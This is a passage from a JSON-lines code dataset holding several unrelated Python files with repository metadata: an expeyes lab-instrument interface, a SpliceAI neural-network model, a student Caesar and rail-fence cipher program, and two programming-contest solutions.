op-amps\n used in the circuit by doing a calibration. The -5V to 5V output is connected to both\n the -5V to +5V inputs before running the calibrate.py program. The output is measured\n with a >= 4.5 digit voltmeter and the calibration constants are stored to the EEPROM.\n WARNING: Using this function may destroy the Calibration Data.\n '''\n addr = ch*8\n s = struct.pack('f'*2, m, c) # pack to floats\n for i in range(2*4):\n self.eeprom_write_char(addr+i, s[i])\n print (ord(s[i]),)\n print()\n self.m[ch] = m\n self.c[ch] = c\n print (_('SC: ch = %d m=%10.6f c=%10.6f')%(ch, self.m[ch], self.c[ch]))\n\n def load_calib(self, ch): # Load m & c from EEPROM\n '''\n Loads the calibration constants from the EEPROM and assigns them to the slope & intercept.\n '''\n res = self.eeprom_read_block(ch*8,8)\n if ord(res[0]) == 255 and ord(res[1]) == 255:\n print (_('BAD Calibration data. EEPROM does not have any data '))\n return\n raw = struct.unpack('f'*2, res)\n self.m[ch] = raw[0]\n self.c[ch] = raw[1]\n for c in res: print (ord(c),)\n print()\n print (_('LC: ch = %d m=%10.6f c=%10.6f')%(ch, self.m[ch], self.c[ch]))\n\n def loadall_calib(self):\n self.load_calib(0)\n self.load_calib(1)\n self.load_calib(8)\n\n#------------------------------------ ADC & DAC transactions -----------------------------\n\n def set_current(self, i):\n '''\n Sets the current of the Programmable Current Source.\n Possible to set it from .020 mA to 2 mA, provided the IR drop across the load resistor < 2V\n Returns the voltage at the Current Source Output.\n '''\n if (i < 0.020) or (i > 2.0):\n print (_('ERR:Current must be from 0.02 to 2.0 mA'))\n return None\n i += 0.005 # 5 uA correction is applied. NEED TO SOLVE THIS PROBLEM !!!\n Rc = 1000.0 # Collector Resistance from 5V reference\n v = 5.0 - Rc * i * 1.0e-3 # mA to A\n #print (_('DAC0 to set current = '), v)\n self.set_voltage(1,v)\n return self.get_voltage(6)\n\n def write_dac(self, ch, data):\n '''\n Writes binary data to DAC. Low level routine, generally not used.\n '''\n if (data > 4095): # DAC linearity problem\n data = 4095\n self.dwrite(chr(SETDAC))\n self.dwrite(chr(ch))\n self.dwrite(chr(data&255))\n self.dwrite(chr(data>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('WRITEDAC error '), res)\n return\n return data\n\n def set_voltage(self, ch, val): # returns the interger send to DAC\n '''\n Sets the voltage outputs. Channel 0 is -5V to +5V and channel 1 is 0V to 5V.\n The DAC output goes only upto 4.990 volts.\n '''\n if val > DACMAX: val = DACMAX # Patch for the MCP4922 Problem\n if val < -DACMAX: val = -DACMAX\n iv = int(round(self.m[8+ch]*val + self.c[8+ch]))\n return self.write_dac(ch,iv)\n\n def set_bpv(self, val): # returns the interger send to DAC\n '''\n Sets the Bipolar Voltage Output (T30) from -4.99 to + 4.99 volts\n '''\n return self.set_voltage(0,val)\n\n def set_upv(self, val): # returns the interger send to DAC\n '''\n Sets the Unipolar Voltage Output (T31) from 0 to + 4.99 volts\n '''\n if val < 0: return\n return self.set_voltage(1,val)\n\n def read_adc(self, ch):\n '''\n Reads the specified ADC channel, returns a number from 0 to 4095. Low level routine.\n '''\n if (ch > 7):\n print (_('Argument error'))\n return\n self.dwrite(chr(READADC))\n self.dwrite(chr(ch))\n res = self.fd.read(1)\n if res != 'D':\n print (_('READADC error '), res)\n return\n res = self.fd.read(2)\n iv = ord(res[0]) | (ord(res[1]) << 8)\n return iv\n\n def get_voltage(self, ch):\n '''\n Reads the specified channel of the ADC. Returns -5V to 5V for channels 0 and 1\n 0V to 5V for other channels.\n '''\n if (ch > 7):\n print (_('Argument error'))\n return\n self.dwrite(chr(READADC))\n self.dwrite(chr(ch))\n res = self.fd.read(1)\n if res != 'D':\n print (_('WRITEDAC error '), res)\n return\n res = self.fd.read(2)\n iv = ord(res[0]) | (ord(res[1]) << 8)\n v = self.m[ch] * iv + self.c[ch]\n return v\n\n def get_voltage_time(self, ch):\n '''\n Reads the specified channel of the ADC. Returns -5V to 5V for channels 0 and 1\n 0V to 5V for other channels. Adds the PC time info\n '''\n if (ch > 7):\n print (_('Argument error'))\n return\n self.dwrite(chr(READADC))\n self.dwrite(chr(ch))\n tm = time.time() # Job is sent. Now mark the time\n res = self.fd.read(1)\n if res != 'D':\n print (_('WRITEDAC error '), res)\n return\n res = self.fd.read(2)\n iv = ord(res[0]) | (ord(res[1]) << 8)\n v = self.m[ch] * iv + self.c[ch]\n return tm, v\n\n def set_samtime(self, sam):\n '''\n Sets the sampling time of MCP3208 ADC, minimum required is 2 uSec. Give more for high input\n impedance signals.\n '''\n if sam > 250:\n print (_('Sampling time MUST NOT exceed 250 microseconds'))\n return\n self.dwrite(chr(SETSAMTIME))\n self.dwrite(chr(sam))\n res = self.fd.read(1)\n if res != 'D':\n print (_('SETSAMTIME ERROR '), res)\n\n def set_adcsize(self, size):\n '''\n The ADC output is 12 bits (2 bytes space). Capture functions gives the option to discard\n 4 LSBs and return the data in 1 byte, saving space and time.\n '''\n if size > 2:\n print (_('ADC datasize MUST be 1 or 2 bytes'))\n return\n self.dwrite(chr(SETADCSIZE))\n self.dwrite(chr(size))\n res = self.fd.read(1)\n if res != 'D':\n print (_('SETADCSIZE ERROR '), res)\n else:\n self.adcsize = size\n\n\n def capture(self, ch, np, delay):\n '''\n Arguments : channel number , number of samples and timegap between consecutive\n digitizations. Returns two lists of size 'np'; time and volatge.\n '''\n if delay < 10:\n return\n if delay < 20:\n self.dwrite(chr(QCAPTURE))\n self.dwrite(chr(ch))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay))\n st = time.time()\n res = self.fd.read(1)\n if res != 'D':\n print (_('QCAPTURE Error '), res, time.time()-st)\n return 0,0\n asize = 1 # adc datasize = 1 for QCAPTURE\n else:\n self.dwrite(chr(CAPTURE))\n self.dwrite(chr(ch))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay&255))\n self.dwrite(chr(delay>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE error '), res)\n return\n res = self.fd.read(1) # adc_size info from other end\n asize = ord(res)\n nc = asize * np\n data = self.fd.read(nc)\n dl = len(data)\n if dl != nc:\n print (_('CAPTURE: size mismatch '), nc, dl)\n return\n\n ta = []\n va = []\n if ch <= 1: # Channel 0 or 1 (-5V to +5V)\n if asize == 2: # 2 byte dataword\n raw = struct.unpack('H'* np, data) # 2 byte words in the structure\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(self.m[ch] * (raw[i]>>4) + self.c[ch])\n else:\n raw = struct.unpack('B'* np, data) # 1 byte words in the structure\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(raw[i]*10.0/255 - 5.0)\n else:\n if asize == 2: # 2 byte dataword\n raw = struct.unpack('H'* np, data) # 16 bit data in uint16 array\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append((raw[i]>>4) * 5.0 / 4095)\n else:\n raw = struct.unpack('B'* np, data) # 8 bit data in byte array\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(raw[i] * 5.0 / 255)\n return ta,va\n\n\n def capture01(self,np, delay):\n '''\n Samples the first two channels 'np' times.\n Time gap between samples is 'delay' usecs.\n If delay < 20, 9 usecs offset between CH0 & CH1, else 17 usecs.\n '''\n if delay < 10:\n return\n if delay < 20: # Fast Capture, datasize = 1 byte\n self.dwrite(chr(QCAPTURE01))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE01 error '), res)\n return\n asize = 1\n tg01 = 0.009 # 0.009 milliseconds between CH0 and CH1\n else: # A slow capture\n self.dwrite(chr(CAPTURE01))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay&255))\n self.dwrite(chr(delay>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE01 error '), res)\n return\n res = self.fd.read(1) # adc_size info from other end\n asize = ord(res)\n tg01 = 0.017 # 0.017 milliseconds between Ch0 & Ch1 digitizations\n\n nb = asize *np * 2 # data from two channels\n data = self.fd.read(nb)\n dl = len(data)\n if dl != nb:\n print (_('CAPTURE01: size mismatch '), nb, dl)\n return\n\n taa = [] # time & voltage arrays for CH0\n vaa = []\n tba = [] # time & voltage arrays for CH1\n vba = []\n if asize == 1: # 1 byte dataword\n raw = struct.unpack('B'* 2*np, data) # 8 bit data in byte array\n for i in range(np):\n taa.append(0.001 * 2 * i * delay)\n vaa.append(raw[2*i] * 10.0 / 255.0 - 5.0)\n tba.append(0.001 * 2 * i * delay + tg01)\n vba.append(raw[2*i +1] * 10.0 / 255.0 - 5.0)\n else:\n raw = struct.unpack('H'* 2*np, data) # 16 bit data in uint16 array\n for i in range(np):\n taa.append(0.001 * 2 * i * delay)\n vaa.append((raw[2*i]>>4) * 10.0 / 4095.0 - 5.0)\n tba.append(0.001 * 2 * i * delay + tg01)\n vba.append((raw[2*i +1]>>4) * 10.0 / 4095.0 - 5.0)\n return taa,vaa,tba,vba\n\n\n def capture_m32(self, ch, np, delay): # Not working properly\n '''\n Capture 'np' samples from the ATmega32 ADC.\n Arguments : channel number , number of samples and timegap between consecutive\n digitizations. Returns a list of [time, volatge] coordinates.\n '''\n if delay < 10:\n return\n self.dwrite(chr(CAPTURE_M32))\n self.dwrite(chr(ch))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay&255))\n self.dwrite(chr(delay>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE_M32 error '), res)\n return\n asize = 1 # datasize = 1 for CAPTURE_M32\n nc = asize * np\n data = self.fd.read(nc)\n dl = len(data)\n if dl != nc:\n print (_('CAPTURE_M32: size mismatch '), nc, dl)\n return\n\n ta = []\n va = []\n raw = struct.unpack('B'* np, data) # 8 bit data in byte array\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(raw[i] * 5.0 / 255)\n return ta,va\n\n#------------------- Modifiers for Capture ------------------------------\n def disable_actions(self):\n '''\n Disable all modifiers to the capture call. The capture will try to\n do a self triggering on the ADC input.\n '''\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(0))\n self.dwrite(chr(0))\n self.fd.read(1)\n\n def enable_wait_high(self, pin):\n '''\n Wait for a HIGH on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITHI))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_wait_rising(self, pin):\n '''\n Wait for a rising EDGE on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n print (_('wait_rising '), AWAITRISE)\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITRISE))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_wait_low(self, pin):\n '''\n Wait for a LOW on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITLO))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_wait_falling(self, pin):\n '''\n Wait for a falling EDGE on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n print (_('wait_rising '), AWAITRISE)\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITFALL))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_set_high(self, pin):\n '''\n Sets the speciied 'pin' HIGH, just before every Capture.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(ASET))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_set_low(self, pin):\n '''\n Sets the speciied 'pin' LOW, just before every Capture.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(ACLR))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_pulse_high(self, pin):\n '''\n Generate a HIGH TRUE Pulse on the speciied 'pin', just before every Capture.\n width is specified by the set_pulsewidth() function.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(APULSEHI))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_pulse_low(self, pin):\n '''\n Generate a LOW TRUE Pulse on the speciied 'pin', just before every Capture.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(APULSELO))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n\n\n#------------------------Time Interval Measurement routines-------------\n def set_pulsepol(self, pol):\n '''\n Sets the 'pulse_polarity' parameter for pulse2rtime()\n pol = 0 means HIGH TRUE pulse\n '''\n self.dwrite(chr(SETPULSEPOL))\n self.dwrite(chr(pol))\n res = self.fd.read(1)\n if res == 'D':\n self.pulse_pol = pol\n\n def set_pulsewidth(self, width):\n '''\n Sets the 'pulse_width' parameter for pulse2rtime() command.\n Also used by usound_time() and the elable_pulse_high/low() functions\n '''\n self.dwrite(chr(SETPULSEWID))\n self.dwrite(chr(width))\n res = self.fd.read(1)\n if res == 'D':\n self.pulse_width = width\n\n def usound_time(self):\n '''\n Used for measuring the velocity of sound. Connect the Transmitter Piezo to OD1 (T4).\n The Receiver is connected to the amplifier input T15. This function measures the time\n from a Pulse on ID1 to a signal on T15, in microseconds.\n Use set_pulsewidth() to set the width to 13 microseconds.\n '''\n self.dwrite(chr(USOUND))\n res = self.fd.read(1)\n if res != 'D':\n print (_('Echo error = '),res)\n return -1.0\n res = self.fd.read(3)\n low = (ord(res[1]) << 8) | ord(res[0])\n return low + 50000 * ord(res[2])\n\n def __helper(self, cmd, pin1, pin2): # pins 0 to 3\n '''\n Used by time measurement functions below.\n Make an 8 bit mask from pin1 and pin2.\n First argument (pin1) is encoded in the HIGH half.\n for example pin1 = 2 , pin2 = 0, mask = 0010:0001\n '''\n if pin1 > 4 or pin2 > 4:\n return -1.0\n if pin1 == 4: # Analog Comparator\n hi = 0\n else:\n hi = 1 << (pin1+4) # digin pins\n \n if pin2 == 4: # wait on Analog comparator\n low = 0\n else:\n low = 1 << pin2\n mask = hi | low;\n self.dwrite(chr(cmd))\n self.dwrite(chr(mask))\n res = self.fd.read(1)\n if res != 'D':\n print (_('Time Measurement call Error. CMD = '), cmd, res)\n return -1.0\n res = self.fd.read(3)\n low = (ord(res[1]) << 8) | ord(res[0])\n return float(low + 50000 * ord(res[2]))\n \n def r2ftime(self, pin1, pin2):\n '''\n Measures time from a rising edge of pin1 to a falling edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(R2FTIME, pin1, pin2)\n\n def f2rtime(self, pin1, pin2):\n '''\n Measures time from a falling edge of pin1 to a rising edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(F2RTIME, pin1, pin2)\n\n def r2rtime(self, pin1, pin2):\n '''\n Measures time from a rising edge of pin1 to a rising edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(R2RTIME, pin1, pin2)\n\n def f2ftime(self, pin1, pin2):\n '''\n Measures time from a falling edge of pin1 to a falling edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(F2FTIME, pin1, pin2)\n\n def set2ftime(self, op, ip):\n '''\n Measures time from Setting output pin 'op' to a LOW on input pin 'ip'\n '''\n return self.__helper(SET2FTIME, op, ip)\n\n def set2rtime(self, op, ip):\n '''\n Measures time from Setting output pin 'op' to a HIGH on input pin 'ip'\n '''\n return self.__helper(SET2RTIME, op, ip)\n\n def clr2rtime(self, op, ip):\n '''\n Measures time from Clearing output pin 'op' to a HIGH on input pin 'ip'\n '''\n return self.__helper(CLR2RTIME, op, ip)\n\n def clr2ftime(self, op, ip):\n '''\n Measures time from Clearing output pin 'op' to a LOW on input pin 'ip'\n '''\n return self.__helper(CLR2FTIME, op, ip)\n\n def pulse2rtime(self, op, ip):\n '''\n Measures time from a Pulse on pin 'op' to a HIGH on input pin 'ip'\n '''\n return self.__helper(PULSE2RTIME, op, ip)\n\n def pulse2ftime(self, op, ip):\n '''\n Measures time from a Pulse on pin 'op' to a LOW on input pin 'ip'\n '''\n return self.__helper(PULSE2FTIME, op, ip)\n\n def multi_r2rtime(self, pin , skipcycles=0):\n '''\n Time between two rising edges on the same input pin.\n separated by 'skipcycles' number of cycles.\n If skipcycles is zero the period of the waveform is returned.\n '''\n if pin > 4: # ADC inputs\n mask = pin << 4\n elif pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n self.dwrite(chr(MULTIR2R))\n self.dwrite(chr(mask))\n self.dwrite(chr(skipcycles))\n if self.fd.read(1) != 'D':\n return -1.0\n res = self.fd.read(3)\n low = (ord(res[1]) << 8) | ord(res[0])\n return float(low + 50000 * ord(res[2]))\n\n\n def adc2cmp(self, ch): # Route ADC input to comparator (AIN-)\n '''\n Route the specified ADC channel to the Analog Comparator Input (AIN-)\n '''\n self.dwrite(chr(ADC2CMP))\n self.dwrite(chr(ch))\n self.fd.read(1)\n\n#----------------------------- Simple Digital I/O functions ----------------------------\n def write_outputs(self, val):\n '''\n Writes a 2 bit number to the Digital Outputs\n '''\n self.dwrite(chr(DIGOUT))\n self.dwrite(chr(val))\n self.fd.read(1)\n\n def read_inputs(self):\n '''\n Gets a 4 bit number representing the Digital Input voltage Levels\n '''\n self.dwrite(chr(DIGIN))\n res = self.fd.read(1)\n if res != 'D':\n print (_('DIGIN error'))\n return\n res = self.fd.read(1)\n return ord(res) & 15 # 4 LSBs\n\n#-----------DIRECT PORT ACCESS FUNCTIONS (Use only if you know what you are doing)---------\n def set_ddr(self, port, direc):\n self.dwrite(chr(SETDDR))\n self.dwrite(chr(port)) # 0 to 3 for A,B,C and D\n self.dwrite(chr(direc))\n self.fd.read(1)\n return\n\n def set_port(self, port, val):\n self.dwrite(chr(SETPORT))\n self.dwrite(chr(port)) # 0 to 3 for A,B,C and D\n self.dwrite(chr(val))\n self.fd.read(1)\n return\n\n def get_port(self, port):\n self.dwrite(chr(SETPORT))\n self.dwrite(chr(port)) # 0 to 3 for A,B,C and D\n self.fd.read(1)\n data = self.fd.read(1) # get the status byte only\n return ord(data)\n\n#--------------------------------- may go to eyeutils.py ------------------------------\n def minimum(self,va):\n vmin = 1.0e10 # need to change\n for v in va:\n if v < vmin:\n vmin = v\n return vmin\n\n def maximum(self,va):\n vmax = 1.0e-10 # need to change\n for v in va:\n if v > vmax:\n vmax = v\n return vmax\n\n def rms(self,va):\n vsum = 0.0\n for v in va:\n vsum += v**2\n v = vsum / len(va)\n return math.sqrt(v)\n\n def mean(self,va):\n vsum = 0.0\n for v in va:\n vsum += v\n v = vsum / len(va)\n return v\n\n def save(self, data, filename = 'plot.dat'):\n '''\n Input data is of the form, [ [x1,y1], [x2,y2],....] where x and y are vectors\n '''\n if data == None: return\n import __builtin__ # Need to do this since 'eyes.py' redefines 'open'\n f = __builtin__.open(filename,'w')\n for xy in data:\n for k in range(len(xy[0])):\n f.write('%5.3f %5.3f\\n'%(xy[0][k], xy[1][k]))\n f.write('\\n')\n f.close()\n\n def grace(self, data, xlab = '', ylab = '', title = ''):\n '''\n Input data is of the form, [ [x1,y1], [x2,y2],....] where x and y are vectors\n '''\n try:\n import pygrace\n global pg\n pg = pygrace.grace()\n for xy in data:\n pg.plot(xy[0],xy[1])\n pg.hold(1) # Do not erase the old data\n pg.xlabel(xlab)\n pg.ylabel(ylab)\n pg.title(title)\n return True\n except:\n return False\n","repo_name":"expeyes/expeyes-programs","sub_path":"expeyes/eyes.py","file_name":"eyes.py","file_ext":"py","file_size_in_byte":40027,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"18"} +{"seq_id":"34898446445","text":"import logging\n\nimport numpy as np\n\nimport torch\nfrom torch import nn\n\n\nclass SpliceAI(nn.Module):\n \"\"\" the base CNN local model based on SpliceAI\"\"\"\n def __init__(self, n_channels, kernel_size, dilation_rate, device='cuda'):\n super(SpliceAI, self).__init__()\n\n self.n_channels = n_channels\n self.kernel_size = kernel_size\n self.dilation_rate = dilation_rate\n\n assert len(self.kernel_size) == len(self.dilation_rate)\n\n self.context_length = 2 * np.sum(\n self.dilation_rate * (self.kernel_size - 1))\n\n self.conv = nn.Conv1d(\n in_channels=4,\n out_channels=self.n_channels,\n kernel_size=1).to(device)\n self.skip = nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=1).to(device)\n\n self.residual_blocks = nn.ModuleList()\n self.skip_connections = nn.ModuleList()\n\n # residual blocks\n self.n_blocks = len(self.kernel_size)\n for i in range(self.n_blocks):\n self.residual_blocks.append(\n nn.Sequential(\n nn.BatchNorm1d(self.n_channels),\n nn.ReLU(),\n nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=self.kernel_size[i],\n dilation=self.dilation_rate[i],\n padding='same'),\n nn.BatchNorm1d(self.n_channels),\n nn.ReLU(),\n nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=self.kernel_size[i],\n dilation=self.dilation_rate[i],\n padding='same')).to(device)\n )\n\n if ((i + 1) % 4 == 0) or ((i + 1) == len(kernel_size)):\n self.skip_connections.append(\n nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=1).to(device)\n )\n\n self.out = nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=3,\n kernel_size=1).to(device)\n self.out_act = nn.Softmax(dim=1)\n\n def forward(self, input, save_feats):\n\n conv = self.conv(input)\n skip = self.skip(conv)\n\n for i in range(self.n_blocks):\n tmp_conv = self.residual_blocks[i](conv)\n conv = torch.add(conv, tmp_conv)\n if ((i + 1) % 4 == 0) or ((i + 1) == self.n_blocks):\n dense = self.skip_connections[i // 4](conv)\n skip = torch.add(skip, dense)\n\n # discard the padded predictions outside of the window\n x = skip[:, :, self.context_length // 2: -self.context_length // 2]\n\n pred = self.out(x)\n pred = self.out_act(pred)\n return (pred, x, None) if save_feats else (pred, None, None)\n\n\n# ensemble of models for evaluation of trained models\nclass SpliceAIEnsemble(nn.Module):\n def __init__(self, models, window_size):\n super(SpliceAIEnsemble, self).__init__()\n self.models = models\n self.window_size = window_size\n\n def forward(self, input):\n\n predictions = torch.zeros(\n size=(len(self.models), input.shape[0], 3, self.window_size)\n )\n\n for ii, model in enumerate(self.models):\n predictions[ii, :, :, :] = model(input)[0].cpu()\n\n combined_predictions = torch.mean(predictions, dim=0)\n\n return combined_predictions, None, None\n","repo_name":"boeselfr/DeepLearningProject","sub_path":"src/splicing/splicing/models/splice_ai.py","file_name":"splice_ai.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16000943580","text":"import time\nimport random\nfrom pathlib import Path\nimport sys\nimport os\nimport socket\nimport RailFenceCipher as R\nimport CaesarCipher as C\n\ndef listToString(s):\n str1 = \"\" # Creating an empty Variable\n for i in s: # add part of the list to the string\n str1 += i\n return str1 # return string\n\nkeys= []\nfor i in range(1,4,1):\n keys.append(2+(i-1)*2)\nos.system( \"attrib -h Keys.txt\" ) # Makes the file visible for writting\nwith open(\"Keys.txt\", 'w') as f:\n f.writelines(str(keys))\n\nwith open(\"Keys.txt\") as f:\n rand_num = f.read()\nos.system( \"attrib +h Keys.txt\" ) # Makes the file hidden to make it inaccessible to users\nrand_num = rand_num.replace(\" \",\"\") # All of\nrand_num = rand_num.replace(\"[\",\"\") # these\nrand_num = rand_num.replace(\"]\",\"\") # are used\nrand_num = rand_num.replace(\",\",\"\") # to remove certain characters so when the \n\nwords = \"Booting up...\"\nfor char in words:\n time.sleep(0.1)\n sys.stdout.write(char)\n sys.stdout.flush()\n\nwords2 = \"\\nWelcome \" + socket.gethostname() + \"!\"\nfor char in words2:\n time.sleep(0.1)\n sys.stdout.write(char)\n sys.stdout.flush()\n\ninput(\"\\nPress 'Enter' to start\\n\")\n\nnew_list = []\ndec_list = []\n\nwhile True:\n state = str(input(\"Do you want to Encrypt or Decrypt?\\n> \")).lower()\n key_num = int(random.choice(rand_num))\n if state == \"encrypt\":\n choice = input(\"Do you want to encrypt text or a file?\\n> \").lower()\n if choice == \"string\" or choice == \"text\": # If the user chooses to encrypt via text\n text = input(\"Input the text: \\n> \")\n string = R.encryptRailFence(text, key_num) # Changes the position of the chracters\n list = ([*string]) # Splits the string, so that every chraracter is in its own index in the list\n length = len(string)\n for i in range(length):\n new_list.append(C.key(ord(list[i]),key_num)) # Changes the value of every character\n dec_list.append(chr(new_list[i]))\n print(\"\".join(map(str,dec_list)), end = \" - is the encrypted form\\n\")\n print(\"The cryptography key = \", key_num)\n done = listToString(dec_list)\n elif choice == \"file\": # If the user chooses to encrypt via a file\n file_name = str(input(\"Please enter the file path: \\n> \"))\n file_name = file_name.replace(\"\\\"\",\"\") # Removes the quotations that are placed by windows when you copy a file path\n with open(file_name) as f:\n text = f.read()\n string = R.encryptRailFence(text, key_num)\n print(\"The file contains the string:\",text)\n list = ([*string])\n length = len(string)\n for i in range(length):\n new_list.append(C.key(ord(list[i]),key_num))\n dec_list.append(chr(new_list[i]))\n done = listToString(dec_list)\n print(done, \"is the encrypted form\")\n print(\"The cryptography key = \", key_num)\n file = input(\"Do you want to save the encrypted form in a file? \\n> \")\n if file == \"Yes\" or file == \"yes\":\n timestr = time.strftime(\"_%d-%m-%Y_%H-%M-%S\") # Reads the time in hh:mm:ss and the date at the time of the program running\n filename_saved = \"encrypted\" + str(timestr) + \".txt\"\n with open(filename_saved, 'w') as f:\n f.write(str(done))\n print(\"File saved as\", filename_saved,\"at\", Path.cwd()) # Path.cwd() prints the path that the file is saved in\n if state == \"decrypt\":\n choice = input(\"Do you want to decrypt text or a file? \\n> \").lower()\n if choice == \"file\":\n file_name = str(input(\"Please enter the file path: \\n> \"))\n file_name = file_name.replace(\"\\\"\",\"\")\n with open(file_name) as f:\n text = f.read()\n print(\"The file contains the string:\",text)\n user_key = int(input(\"Enter your cryptography key:\\n> \"))\n string = R.decryptRailFence(text,user_key)\n list = ([*string])\n length = len(string)\n for i in range(length):\n new_list.append(C.unkey(ord(list[i]),user_key))\n dec_list.append(chr(new_list[i]))\n done = listToString(dec_list)\n print(\"\".join(map(str,dec_list)), end = \" - is the decrypted form\\n\")\n elif choice == \"string\" or choice == \"text\":\n text = input(\"Input the text\\n> \")\n user_key = int(input(\"Enter your cryptography key:\\n> \"))\n string = R.decryptRailFence(text,user_key)\n list = ([*string])\n length = len(string)\n for i in range(length):\n new_list.append(C.unkey(ord(list[i]),user_key))\n dec_list.append(chr(new_list[i]))\n done = listToString(dec_list)\n print(\"\".join(map(str,dec_list)), end = \" - is the decrypted form\\n\")\n file = input(\"Do you want to save the decrypted form in a file? \\n> \")\n if file == \"Yes\" or file == \"yes\":\n timestr = time.strftime(\"_%d-%m-%Y_%H-%M-%S\")\n filename_saved = \"decrypted\" + str(timestr) + \".txt\"\n with open(filename_saved, 'w') as f:\n f.write(str(done))\n print(\"File saved as\", filename_saved,\"at\", Path.cwd())\n program_state = str(input(\"Do you want to retry?\\n> \")).lower()\n if program_state == \"yes\":\n new_list = [] # Empties both lists\n dec_list = [] # ↑\n continue\n else:\n break # If the user types anything other than \"yes\", break the loop which will make pyhton go to line 128 (Ending the code)\ninput(\"\\nPress 'Enter' to close\")","repo_name":"BadrElGezeri/Programming-and-Algorithms-1-Coursework-1","sub_path":"Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74782727721","text":"import networkx as nx\nfrom utils import read_inputs\nfrom day12_part1 import condition, find_letter\n\nINPUT_FILE = \"2022/inputs/day12.txt\"\n\nif __name__ == \"__main__\":\n # read inputs\n grid_input = read_inputs(INPUT_FILE, split=True)\n num_rows, num_cols = len(grid_input), len(grid_input[0])\n base_grid_graph = nx.grid_2d_graph(num_rows, num_cols)\n\n # build subgraph\n climbing_graph = nx.DiGraph()\n for node1, node2 in base_grid_graph.edges():\n if condition(node1, node2, grid_input):\n climbing_graph.add_edge(node1, node2)\n\n if condition(node2, node1, grid_input):\n climbing_graph.add_edge(node2, node1)\n\n # get start and end\n start = find_letter(grid_input, \"S\")\n end = find_letter(grid_input, \"E\")\n\n # Dijkstra\n shortest_lengths = nx.shortest_path_length(climbing_graph, target=end)\n\n best = None\n for i in range(len(grid_input)):\n for j in range(len(grid_input[0])):\n if (grid_input[i][j] in {\"a\", \"S\"}) and ((i, j) in shortest_lengths):\n if best is None or best > shortest_lengths[(i, j)]:\n best = shortest_lengths[(i, j)]\n\n print(best)\n","repo_name":"danieltsoukup/adventofcode","sub_path":"2022/code/day12_part2.py","file_name":"day12_part2.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38746609631","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef solve():\n n, k = map(int, input().split())\n ans = 0\n if n >= k:\n ans = (n - k + 1) / n\n al = [2 ** i for i in range(1, 18)]\n for i in range(1, min(n + 1, k)):\n for j in al:\n if i * j >= k:\n ans += (1 / n) * (1 / j)\n break\n print(ans)\n\nif __name__==\"__main__\":\n solve()\n","repo_name":"yumechi/AtCoderHandoutCodes","sub_path":"ABC/ABC126/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37106097068","text":"# -*- coding: utf-8 -*-\nimport 